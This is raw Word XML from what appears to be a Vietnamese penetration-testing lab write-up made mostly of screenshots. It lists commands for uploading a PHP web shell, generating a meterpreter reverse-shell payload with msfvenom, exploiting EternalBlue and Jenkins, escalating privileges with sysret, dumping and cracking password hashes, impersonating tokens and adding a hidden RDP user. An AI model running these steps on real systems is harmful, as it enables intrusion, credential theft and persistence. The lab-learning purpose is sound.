            <wp:extent cx="5943600" cy="11080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350F1EA" w14:textId="232F6263" w:rsidR="00D618D5" w:rsidRDefault="000B3C7E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Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDE2277" w14:textId="51A2A54B" w:rsidR="00FB3151" w:rsidRDefault="00FB315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315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4D031FF" wp14:editId="5AE881CD">
            <wp:extent cx="5943600" cy="4255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92E" w14:textId="603EE94B" w:rsidR="00821881" w:rsidRDefault="0082188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 cách khác để upload file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABFE58" w14:textId="0D26FBF5" w:rsidR="00821881" w:rsidRDefault="0082188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21881">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -T "/home/kali/Desktop/newweb.php" </w:t>
      </w:r>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidRPr="00956289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://192.168.44.132:8585/uploads/pay.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D161E50" w14:textId="0B0F0C29" w:rsidR="00821881" w:rsidRDefault="00520BF9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20BF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522C34" wp14:editId="1267960A">
            <wp:extent cx="5943600" cy="12788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54C" w14:textId="10FA6222" w:rsidR="000B3C7E" w:rsidRDefault="000B3C7E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ào link kiểm tra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387A3B93" w14:textId="6AA432AF" w:rsidR="00D618D5" w:rsidRDefault="00D618D5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18D5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505C3E2" wp14:editId="19386967">
            <wp:extent cx="4572638" cy="3296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66FC" w14:textId="691ACFC9" w:rsidR="004B562B" w:rsidRDefault="004B562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iếm payload</w:t>
      </w:r>
      <w:r w:rsidR="00A33FDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E788C" w14:textId="182969F5" w:rsidR="00E4297B" w:rsidRDefault="004B562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562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2C036D" wp14:editId="729AB18E">
            <wp:extent cx="5943600" cy="2179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301" w14:textId="778BCFE0" w:rsidR="007F62CA" w:rsidRDefault="007F6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D95247" w14:textId="77777777" w:rsidR="00AA0F66" w:rsidRDefault="00AA0F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6F2C1D" w14:textId="77777777" w:rsidR="00AA0F66" w:rsidRDefault="00AA0F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EBDBED" w14:textId="77777777" w:rsidR="00AA0F66" w:rsidRDefault="00AA0F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AD3F7B" w14:textId="77777777" w:rsidR="00AA0F66" w:rsidRDefault="00AA0F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DFB236" w14:textId="3C610297" w:rsidR="00AA0F66" w:rsidRDefault="00AA0F6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hạy payload và kích vào file vừa mới upload để lấy reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383959BD" w14:textId="542C3450" w:rsidR="004B562B" w:rsidRDefault="00AA0F6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A0F6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88B858F" wp14:editId="395BECDE">
            <wp:extent cx="5943600" cy="45891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61C5" w14:textId="77777777" w:rsidR="004B562B" w:rsidRDefault="004B562B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2E799E" w14:textId="2DAC5325" w:rsidR="009E74EF" w:rsidRDefault="009E74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2059A5" w14:textId="77777777" w:rsidR="00620435" w:rsidRDefault="0062043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D8B6324" w14:textId="2382C731" w:rsidR="009E74EF" w:rsidRDefault="009E74EF" w:rsidP="00FF0B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74EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SMTP Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1284AEB2" w14:textId="4CD394F3" w:rsidR="009E74EF" w:rsidRDefault="000D1D5F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1D5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83801D6" wp14:editId="2D521019">
            <wp:extent cx="5943600" cy="3458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1467" w14:textId="5766FDD7" w:rsidR="00453CDB" w:rsidRDefault="00453CD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524FB3F" w14:textId="054AC048" w:rsidR="0028549B" w:rsidRDefault="00453CDB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KHAI THÁC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF4CEB" w14:textId="6061D39E" w:rsidR="00453CDB" w:rsidRDefault="00453CDB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ternal blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24004338" w14:textId="6FBB0C10" w:rsidR="00453CDB" w:rsidRDefault="00453CDB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3CD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23A872F" wp14:editId="7857B8C1">
            <wp:extent cx="5943600" cy="4584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C562" w14:textId="288688E3" w:rsidR="003D2E93" w:rsidRDefault="003D2E93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t rhost and payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C9C86" w14:textId="36DE820E" w:rsidR="003D2E93" w:rsidRDefault="003D2E93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2E9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A517FE3" wp14:editId="06471346">
            <wp:extent cx="5943600" cy="10255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F2D" w14:textId="008E8DE5" w:rsidR="00C904E1" w:rsidRDefault="00C904E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E634AC" w14:textId="53FF82C4" w:rsidR="00C904E1" w:rsidRDefault="00C904E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487A3D" w14:textId="53863240" w:rsidR="00C904E1" w:rsidRDefault="00C904E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FA4965" w14:textId="43A64167" w:rsidR="00C904E1" w:rsidRDefault="00C904E1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Reverseshell – lang nghe port tren may nan nhan</w:t>
      </w:r>
      <w:r w:rsidR="00396A60">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> va may nan nhan se gui ve may tan cong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40045F0A" w14:textId="50F2B6B0" w:rsidR="003D2E93" w:rsidRDefault="003D2E93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2E9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D5799E" wp14:editId="2B647AE5">
            <wp:extent cx="5943600" cy="4091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439" w14:textId="5153BC0D" w:rsidR="0032104C" w:rsidRDefault="002F2D68" w:rsidP="00D02B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F2D6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867AC07" wp14:editId="5C3F4529">
            <wp:extent cx="4296375" cy="523948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0E2" w14:textId="77777777" w:rsidR="0032104C" w:rsidRDefault="00321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EA0290E" w14:textId="197614AE" w:rsidR="002F2D68" w:rsidRDefault="0032104C" w:rsidP="003210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XPLOIT JENKIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62040CB5" w14:textId="5068701E" w:rsidR="0032104C" w:rsidRDefault="0032104C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A20C1C" w14:textId="087B7E32" w:rsidR="0032104C" w:rsidRDefault="002F1A47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ở msfconsole và dùng lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="0032104C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Services -s http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F8AA9" w14:textId="3F9F4659" w:rsidR="0032104C" w:rsidRDefault="0032104C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210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896202" wp14:editId="069E3624">
            <wp:extent cx="5943600" cy="21088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F38" w14:textId="202B54F2" w:rsidR="00A354CE" w:rsidRDefault="00A354CE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uy cập ip:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39668236" w14:textId="0646CE64" w:rsidR="00A354CE" w:rsidRDefault="00A354CE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ùng lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED2A54" w14:textId="77777777" w:rsidR="00A354CE" w:rsidRPr="00A354CE" w:rsidRDefault="00A354CE" w:rsidP="00A35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A354C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ef sout = new StringBuilder(), serr = new StringBuilder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7DC59C" w14:textId="7FCC4219" w:rsidR="00A354CE" w:rsidRPr="00A354CE" w:rsidRDefault="00A354CE" w:rsidP="00A35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A354C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f proc = </w:t>
      </w:r>
      <w:r w:rsidR="007D320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‘ipconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00A354C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'.execute()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4612DD7E" w14:textId="77777777" w:rsidR="00A354CE" w:rsidRPr="00A354CE" w:rsidRDefault="00A354CE" w:rsidP="00A35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A354C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roc.consumeProcessOutput(sout, serr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8134C" w14:textId="77777777" w:rsidR="00A354CE" w:rsidRPr="00A354CE" w:rsidRDefault="00A354CE" w:rsidP="00A35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A354C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roc.waitForOrKill(1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0299335D" w14:textId="77777777" w:rsidR="00A354CE" w:rsidRPr="00A354CE" w:rsidRDefault="00A354CE" w:rsidP="00A35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A354C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rintln "out&gt; $sout\nerr&gt; $serr"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FB2E9" w14:textId="77777777" w:rsidR="00A354CE" w:rsidRPr="00A354CE" w:rsidRDefault="00A354CE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27B8D3" w14:textId="4F0F0E65" w:rsidR="00783DE5" w:rsidRDefault="00A354CE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354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A188AA4" wp14:editId="5136D53C">
            <wp:extent cx="5943600" cy="2346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07BE" w14:textId="3C3DCFB4" w:rsidR="00D6198C" w:rsidRDefault="00D6198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A55F167" w14:textId="7D6D3B0F" w:rsidR="00D6198C" w:rsidRDefault="00D6198C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xploit Jenkins với msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627FB492" w14:textId="376F8789" w:rsidR="00D6198C" w:rsidRDefault="00D6198C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t rhosts,rport,</w:t>
      </w:r>
      <w:r w:rsidR="00213F4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> target uri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C7598" w14:textId="7C549E98" w:rsidR="00D6198C" w:rsidRDefault="00D6198C" w:rsidP="00321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198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5552A93" wp14:editId="1B11300E">
            <wp:extent cx="5943600" cy="5585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78F" w14:textId="77777777" w:rsidR="000B359C" w:rsidRDefault="000B35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9FF1439" w14:textId="0C86C7CC" w:rsidR="00850BBE" w:rsidRDefault="00E9086F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ruteforce port</w:t>
      </w:r>
      <w:r w:rsidR="000A0557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566410A0" w14:textId="1EB9FDA3" w:rsidR="000A0557" w:rsidRDefault="00D439EF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39E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FC238A" wp14:editId="77DDCB44">
            <wp:extent cx="5943600" cy="48012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09DF" w14:textId="77777777" w:rsidR="00A862EC" w:rsidRDefault="00A862EC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ao file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460A7208" w14:textId="77777777" w:rsidR="00B8353B" w:rsidRDefault="00A862EC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862EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp_allports  LHO=192.168.44.128  -f exe --platform windows -o  eva.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604415AD" w14:textId="745111BA" w:rsidR="00973616" w:rsidRDefault="00A862EC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862E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16C176" wp14:editId="6BF1D8A8">
            <wp:extent cx="5943600" cy="9677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09A0" w14:textId="34A37B56" w:rsidR="00F56EBC" w:rsidRDefault="00F56EBC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56EBC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EBF6C14" wp14:editId="00C4D2A1">
            <wp:extent cx="5943600" cy="20916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39F" w14:textId="49888C21" w:rsidR="00B8353B" w:rsidRDefault="00B8353B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8353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674A49C" wp14:editId="0C9371FD">
            <wp:extent cx="5943600" cy="31280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372" w14:textId="57624253" w:rsidR="00A862EC" w:rsidRDefault="00A862EC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974423" w14:textId="66124592" w:rsidR="005376C5" w:rsidRDefault="008B5B26" w:rsidP="00020D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B5B2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8962A51" wp14:editId="12E0571F">
            <wp:extent cx="5943600" cy="18059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E8CC" w14:textId="77777777" w:rsidR="005376C5" w:rsidRDefault="005376C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8A4670D" w14:textId="3036C482" w:rsidR="0091411B" w:rsidRDefault="004E1AD4" w:rsidP="001C4D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1AD4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dùng Script tự động tấn công kiểm định System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB6FB8F" w14:textId="659CEB43" w:rsidR="009F410E" w:rsidRDefault="009F410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ùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="009F410E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>makerc /home/kali/Desktop/scan-ms17.rc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để lưu lại các command đã dung trên msf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D8612" w14:textId="08F1A584" w:rsidR="00297921" w:rsidRDefault="00BB3298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B329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498D7F" wp14:editId="039D03ED">
            <wp:extent cx="5943600" cy="18040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5CFF" w14:textId="429659BE" w:rsidR="00CB7FE7" w:rsidRDefault="00CB7FE7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ùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB7FE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>resource /home/kali/Desktop/scan-ms17.rc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để chạy tự động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDB1FB" w14:textId="527C0B28" w:rsidR="00CB7FE7" w:rsidRDefault="00CB7FE7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B7FE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FF0B2AD" wp14:editId="52FF5945">
            <wp:extent cx="5943600" cy="16929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3A9C" w14:textId="77777777" w:rsidR="0043489F" w:rsidRDefault="0043489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BC4DFE9" w14:textId="2EF4B6DE" w:rsidR="00F602B7" w:rsidRDefault="00C225E6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25E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TẤN CÔNG đi sâu vào Advanced Privilege Escalation Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFCB972" w14:textId="0C6621EC" w:rsidR="00C225E6" w:rsidRDefault="00C225E6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301062" w14:textId="6501F052" w:rsidR="007C5B71" w:rsidRDefault="007C5B7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hai thác lỗi eternal blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D6A7C" w14:textId="447D8845" w:rsidR="007C5B71" w:rsidRDefault="007C5B7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C5B7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EC0E698" wp14:editId="6CE7579C">
            <wp:extent cx="5943600" cy="47180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93F6" w14:textId="790016EF" w:rsidR="007D5024" w:rsidRDefault="007D5024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ã thành công nhưng chưa chiếm full quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137CD5D9" w14:textId="4D412811" w:rsidR="007D5024" w:rsidRDefault="007D5024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502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66EDD2" wp14:editId="78883DE8">
            <wp:extent cx="5943600" cy="1492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E0FA" w14:textId="14941D94" w:rsidR="00FC54EA" w:rsidRDefault="00FC54EA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Gõ ps để xem các process, </w:t>
      </w:r>
      <w:r w:rsidR="00B47CA1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>dù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igrate pid explorer.exe nhưng 0 thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D41FC0" w14:textId="029D7458" w:rsidR="00FC54EA" w:rsidRDefault="00FC54EA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54E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31518C3" wp14:editId="61FC6B64">
            <wp:extent cx="5943600" cy="5480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1108" w14:textId="4E24EFA7" w:rsidR="00B47CA1" w:rsidRDefault="00B47C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u khi dùng các payload post exploit 0 thành công thì down sysret về.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0AC496" w14:textId="36D70973" w:rsidR="00B47CA1" w:rsidRDefault="00DC32D8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74" w:history="1">
        <w:r w:rsidR="00B47CA1" w:rsidRPr="00FE27F8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dl.packetstormsecurity.net/1208-exploits/sysret.rar</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72925691" w14:textId="7BD0BE8C" w:rsidR="00E008D1" w:rsidRDefault="00E008D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u đó, upload file lên máy window</w:t>
      </w:r>
      <w:r w:rsidR="00703D22">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>. Rồi migrate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FD36E" w14:textId="7C25E5E8" w:rsidR="00B47CA1" w:rsidRDefault="00E008D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08D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D12B7B8" wp14:editId="53C6EFC6">
            <wp:extent cx="5524825" cy="52963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31059" cy="53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886C" w14:textId="47F5A8E8" w:rsidR="001F3613" w:rsidRDefault="001F3613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au khi chiếm full quyền thì có thể dung các lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00B8634F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>như hình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ưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2699C315" w14:textId="5659B35E" w:rsidR="001F3613" w:rsidRDefault="001F3613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361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5DCFEAB" wp14:editId="623C65BA">
            <wp:extent cx="5943600" cy="340106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890" w14:textId="5815E643" w:rsidR="007D6848" w:rsidRDefault="007D6848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66400A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0F21A5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F669FE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35529A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D5DFCB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43AD2E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71C17C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1E6CD2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A721D1" w14:textId="77777777" w:rsidR="00305DA1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D5F684" w14:textId="2D5F09E9" w:rsidR="008D3C5E" w:rsidRDefault="00305DA1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ùng module hashdump để lấy hash password của các acc trong win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F7A32" w14:textId="4450CF0C" w:rsidR="003A53B0" w:rsidRDefault="003A53B0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A53B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C40FD5C" wp14:editId="16CC6BF5">
            <wp:extent cx="5492750" cy="47720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195"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5492755" cy="477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CDBB" w14:textId="017EABE4" w:rsidR="00FA5017" w:rsidRDefault="00FA5017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u khi dump password thì dung john để crack hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77804D8C" w14:textId="3B564CC7" w:rsidR="008D3C5E" w:rsidRDefault="008D3C5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D3C5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0DF3FA9" wp14:editId="09D092E1">
            <wp:extent cx="5943600" cy="22117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3FA9" w14:textId="279AFDAB" w:rsidR="00B32FE0" w:rsidRDefault="00DD36A7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ột số tài khoản sau khi lấy được pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00025BC5" w14:textId="6FF3A2E7" w:rsidR="00DD36A7" w:rsidRDefault="00DD36A7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D36A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8AEE5BA" wp14:editId="7BFEB19F">
            <wp:extent cx="5943600" cy="9988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774B" w14:textId="19FC55DE" w:rsidR="00D02D70" w:rsidRDefault="00F23082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23082">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Dùng MSF Mạo Danh Token chiếm quyền Administrator System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076DB73" w14:textId="6ACD8E49" w:rsidR="00343673" w:rsidRDefault="00343673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538C26" w14:textId="4AC01C77" w:rsidR="004E0E3B" w:rsidRPr="001D0CC7" w:rsidRDefault="00343673" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0E3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Load incognito để load các msf  Mạo Danh Token. Sau đó list token để  xem các token của user</w:t>
      </w:r>
      <w:r w:rsidR="004E0E3B" w:rsidRPr="004E0E3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004E0E3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E0E3B" w:rsidRPr="001D0CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Delegation tokens:</w:t>
      </w:r>
      <w:r w:rsidR="001D0CC7" w:rsidRPr="001D0CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> token được quỷ quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD8799C" w14:textId="6C524742" w:rsidR="00343673" w:rsidRPr="001D0CC7" w:rsidRDefault="004E0E3B" w:rsidP="00297921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D0CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Imersonation tokens:</w:t>
      </w:r>
      <w:r w:rsidR="00A026F8" w:rsidRPr="001D0CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D0CC7" w:rsidRPr="001D0CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sinh ra để mạo danh thông qua</w:t>
      </w:r>
      <w:r w:rsidR="00A026F8" w:rsidRPr="001D0CC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ssh, rdp,..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26302CDF" w14:textId="512E8419" w:rsidR="00C02741" w:rsidRDefault="00343673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367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1812BDF" wp14:editId="6778A26E">
            <wp:extent cx="5943600" cy="44430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B3" w14:textId="2515E0C7" w:rsidR="0044216B" w:rsidRDefault="00195AD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hực hiện mạo danh token </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535CE5FE" w14:textId="48F2D32C" w:rsidR="00195ADE" w:rsidRDefault="00195AD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95AD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8A0615" wp14:editId="4F182633">
            <wp:extent cx="5801535" cy="1571844"/>
            <wp:effectExtent l="0" t="0" r="889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29FC" w14:textId="68732C0C" w:rsidR="0029156A" w:rsidRDefault="0029156A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hụp màn hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256DA832" w14:textId="76561EF0" w:rsidR="0029156A" w:rsidRDefault="00EA053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A053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0EDD85E" wp14:editId="1F927FAB">
            <wp:extent cx="5782482" cy="3077004"/>
            <wp:effectExtent l="0" t="0" r="889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B0F7" w14:textId="77777777" w:rsidR="00EA053E" w:rsidRDefault="00EA053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998ABC9" w14:textId="3829A5C0" w:rsidR="00EA053E" w:rsidRDefault="00EA053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A053E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bí mật Remote Desktop User trên Server mà không bị log out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C89ADB" w14:textId="2A4C8288" w:rsidR="007345AD" w:rsidRDefault="007345AD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ùng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="007345AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">run getgui -u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&lt;user&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007345AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>&lt;pass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54387804" w14:textId="71B8DF44" w:rsidR="007345AD" w:rsidRDefault="007345AD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ệnh này sẽ tạo user mới add vào trong hệ thống để rdp mà 0 chiếm sessions của user hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92A031" w14:textId="036429B4" w:rsidR="007345AD" w:rsidRDefault="007345AD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345A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63E2329" wp14:editId="4109A6B0">
            <wp:extent cx="5943600" cy="39287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BF8" w14:textId="77777777" w:rsidR="00856A1E" w:rsidRDefault="00856A1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4A097DD" w14:textId="3D1B9E65" w:rsidR="004335D2" w:rsidRDefault="004335D2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35D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desktop -u hiep -p 1234 192.168.44.132   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7EFB5A" w14:textId="508FFB1F" w:rsidR="00D9184B" w:rsidRDefault="00D9184B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9184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DB4141C" wp14:editId="45EBD682">
            <wp:extent cx="5943600" cy="247332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2022" w14:textId="77777777" w:rsidR="00906D51" w:rsidRDefault="00906D5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F04967B" w14:textId="05D578C0" w:rsidR="00C81B8B" w:rsidRDefault="00D443A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43AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Search Critical Analyze – info SRV – download phân tích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7659BCD0" w14:textId="07E98B51" w:rsidR="00D443AE" w:rsidRDefault="00D443AE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43AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>run  post/windows/gather/enum_files FILE_GLOBS=*tomcat*.xml SEARCH_FROM=C:\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25925A2D" w14:textId="70E80E1F" w:rsidR="004C37F6" w:rsidRDefault="004C37F6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dule này sẽ kiếm các file liên quan tới tomcat xml từ ổ C và tự động download về máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C4421A" w14:textId="7A1E3CBD" w:rsidR="004C5FEA" w:rsidRDefault="00D54EA9" w:rsidP="002979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54EA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0F8CD3D" wp14:editId="18EA501B">
            <wp:extent cx="5943600" cy="49250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19B1" w14:textId="77777777" w:rsidR="004C5FEA" w:rsidRDefault="004C5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E99B76A" w14:textId="598BB601" w:rsidR="00A05A32" w:rsidRDefault="00906D51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6D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
